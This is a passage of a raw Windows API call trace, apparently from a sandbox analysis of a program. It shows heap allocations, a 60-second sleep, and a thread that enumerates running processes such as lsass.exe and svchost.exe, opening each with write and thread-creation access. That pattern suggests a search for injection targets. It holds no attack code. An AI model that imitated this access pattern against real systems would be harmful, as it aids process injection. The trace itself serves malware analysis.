GetProcessHeap () returned 0xe30000 [0141.005] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0141.005] GetProcessHeap () returned 0xe30000 [0141.005] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0141.005] GetProcessHeap () returned 0xe30000 [0141.005] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0141.005] GetProcessHeap () returned 0xe30000 [0141.005] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0141.005] GetProcessHeap () returned 0xe30000 [0141.005] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0141.005] GetProcessHeap () returned 0xe30000 [0141.005] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0141.005] GetProcessHeap () returned 0xe30000 [0141.005] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0141.005] GetProcessHeap () returned 0xe30000 [0141.005] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0141.005] GetProcessHeap () returned 0xe30000 [0141.005] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0141.005] GetProcessHeap () returned 0xe30000 [0141.005] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0141.005] GetProcessHeap () returned 0xe30000 [0141.005] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0141.005] GetProcessHeap () returned 0xe30000 [0141.005] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0141.005] GetProcessHeap () returned 0xe30000 [0141.005] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0141.005] GetProcessHeap () returned 0xe30000 [0141.005] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0141.005] GetProcessHeap () returned 0xe30000 [0141.005] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0141.005] GetProcessHeap () returned 0xe30000 [0141.005] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0141.005] GetProcessHeap () returned 0xe30000 [0141.005] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0141.005] GetProcessHeap () returned 0xe30000 [0141.005] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0141.005] GetProcessHeap () returned 0xe30000 [0141.005] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0141.005] GetProcessHeap () returned 0xe30000 [0141.006] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0141.006] GetProcessHeap () returned 0xe30000 [0141.006] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0141.006] GetProcessHeap () returned 0xe30000 [0141.006] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0141.006] GetProcessHeap () returned 0xe30000 [0141.006] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0141.006] GetProcessHeap () returned 0xe30000 [0141.006] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0141.006] GetProcessHeap () returned 0xe30000 [0141.006] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0141.006] GetProcessHeap () returned 0xe30000 [0141.006] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0141.006] GetProcessHeap () returned 0xe30000 [0141.006] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0141.006] GetProcessHeap () returned 0xe30000 [0141.006] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0141.006] GetProcessHeap () returned 0xe30000 [0141.006] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0141.006] GetProcessHeap () returned 0xe30000 [0141.006] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0141.006] GetProcessHeap () returned 0xe30000 [0141.006] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0141.006] GetProcessHeap () returned 0xe30000 [0141.006] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0141.006] GetProcessHeap () returned 0xe30000 [0141.006] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0141.006] GetProcessHeap () returned 0xe30000 [0141.006] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0141.006] GetProcessHeap () returned 0xe30000 [0141.006] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0141.006] GetProcessHeap () returned 0xe30000 [0141.006] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0141.006] GetProcessHeap () returned 0xe30000 [0141.006] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0141.006] GetProcessHeap () returned 0xe30000 [0141.006] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0141.006] GetProcessHeap () returned 0xe30000 [0141.006] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0141.006] GetProcessHeap () returned 0xe30000 [0141.006] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0141.006] GetProcessHeap () returned 0xe30000 [0141.007] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0141.007] GetProcessHeap () returned 0xe30000 [0141.007] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0141.007] GetProcessHeap () returned 0xe30000 [0141.007] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0141.007] GetProcessHeap () returned 0xe30000 [0141.007] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0141.007] GetProcessHeap () returned 0xe30000 [0141.007] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0141.008] GetProcessHeap () returned 0xe30000 [0141.008] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf0daf8 | out: hHeap=0xe30000) returned 1 [0141.008] GetProcessHeap () returned 0xe30000 [0141.008] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0141.008] GetProcessHeap () returned 0xe30000 [0141.008] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2bbc8 | out: hHeap=0xe30000) returned 1 [0141.008] GetProcessHeap () returned 0xe30000 [0141.008] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed4530 | out: hHeap=0xe30000) returned 1 [0141.008] Sleep (dwMilliseconds=0xea60) Thread: id = 10 os_tid = 0xddc [0059.858] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3f8 [0059.868] Process32FirstW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0059.868] GetCurrentProcessId () returned 0xf00 [0059.868] GetCurrentProcess () returned 0xffffffff [0059.868] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.868] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0059.868] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0059.869] GetCurrentProcessId () returned 0xf00 [0059.869] GetCurrentProcess () returned 0xffffffff [0059.869] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.869] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0059.869] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0059.871] GetCurrentProcessId () returned 0xf00 [0059.871] GetCurrentProcess () returned 0xffffffff [0059.871] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.871] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x140) returned 0x0 [0059.871] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0059.871] GetCurrentProcessId () returned 0xf00 [0059.871] GetCurrentProcess () returned 0xffffffff [0059.871] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.871] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x198) returned 0x0 [0059.872] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0059.872] GetCurrentProcessId () returned 0xf00 [0059.872] GetCurrentProcess () returned 0xffffffff [0059.872] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.872] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0059.872] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0059.873] GetCurrentProcessId () returned 0xf00 [0059.873] GetCurrentProcess () returned 0xffffffff [0059.873] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.873] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0059.873] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0059.873] GetCurrentProcessId () returned 0xf00 [0059.873] GetCurrentProcess () returned 0xffffffff [0059.873] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.873] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x220) returned 0x0 [0059.873] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0059.874] GetCurrentProcessId () returned 0xf00 [0059.874] GetCurrentProcess () returned 0xffffffff [0059.874] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.874] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0059.874] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0059.875] GetCurrentProcessId () returned 0xf00 [0059.875] GetCurrentProcess () returned 0xffffffff [0059.875] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.875] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x244) returned 0x0 [0059.875] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0059.876] GetCurrentProcessId () returned 0xf00 [0059.876] GetCurrentProcess () returned 0xffffffff [0059.876] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.876] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2a4) returned 0x0 [0059.876] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0059.877] GetCurrentProcessId () returned 0xf00 [0059.877] GetCurrentProcess () returned 0xffffffff [0059.877] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.877] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0059.877] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0059.877] GetCurrentProcessId () returned 0xf00 [0059.877] GetCurrentProcess () returned 0xffffffff [0059.877] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.878] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2b4) returned 0x0 [0059.878] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0059.878] GetCurrentProcessId () returned 0xf00 [0059.878] GetCurrentProcess () returned 0xffffffff [0059.878] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.878] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0059.878] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0059.879] GetCurrentProcessId () returned 0xf00 [0059.879] GetCurrentProcess () returned 0xffffffff [0059.879] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.879] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0059.879] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x59, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0059.879] GetCurrentProcessId () returned 0xf00 [0059.879] GetCurrentProcess () returned 0xffffffff [0059.879] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.879] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0059.880] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0059.880] GetCurrentProcessId () returned 0xf00 [0059.880] GetCurrentProcess () returned 0xffffffff [0059.880] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.880] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0 [0059.880] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0059.881] GetCurrentProcessId () returned 0xf00 [0059.881] GetCurrentProcess () returned 0xffffffff [0059.881] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.881] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3d8) returned 0x0 [0059.881] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0059.881] GetCurrentProcessId () returned 0xf00 [0059.881] GetCurrentProcess () returned 0xffffffff [0059.881] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.881] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0059.881] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0059.882] GetCurrentProcessId () returned 0xf00 [0059.882] GetCurrentProcess () returned 0xffffffff [0059.882] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.882] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x350) returned 0x0 [0059.882] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0059.882] GetCurrentProcessId () returned 0xf00 [0059.883] GetCurrentProcess () returned 0xffffffff [0059.883] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.883] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x434) returned 0x0 [0059.883] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0059.883] GetCurrentProcessId () returned 0xf00 [0059.883] GetCurrentProcess () returned 0xffffffff [0059.883] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.883] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x554) returned 0x0 [0059.883] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0059.884] GetCurrentProcessId () returned 0xf00 [0059.884] GetCurrentProcess () returned 0xffffffff [0059.884] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.884] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x590) returned 0x0 [0059.884] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0059.884] GetCurrentProcessId () returned 0xf00 [0059.884] GetCurrentProcess () returned 0xffffffff [0059.884] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.885] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x598) returned 0x0 [0059.885] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0059.885] GetCurrentProcessId () returned 0xf00 [0059.885] GetCurrentProcess () returned 0xffffffff [0059.885] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.885] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x5b0) returned 0x0 [0059.885] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0059.886] GetCurrentProcessId () returned 0xf00 [0059.886] GetCurrentProcess () returned 0xffffffff [0059.886] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.886] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x5e8) returned 0x0 [0059.886] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 